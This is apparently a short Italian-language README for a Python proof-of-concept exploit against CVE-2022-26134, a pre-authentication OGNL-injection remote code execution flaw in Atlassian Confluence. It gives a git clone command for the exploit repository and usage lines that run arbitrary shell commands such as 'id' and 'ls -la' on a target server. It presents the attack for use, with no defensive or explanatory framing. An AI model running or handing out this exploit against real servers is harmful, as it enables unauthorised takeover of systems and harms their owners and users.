
Exploit PoC in Python per CVE-2022-26134, una vulnerabilità di esecuzione remota di codice pre-autenticazione in Atlassian Confluence tramite iniezione OGNL. Esegue comandi arbitrari sui server vulnerabili.
CVE-2022-26134 - RCE Pre-Auth di Confluence | iniezione OGNL
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
UTILIZZO: python3 exploit.py https://target.com COMANDO
Es: python3 exploit.py https://target.com id
Es: python3 exploit.py https://target.com 'ls -la'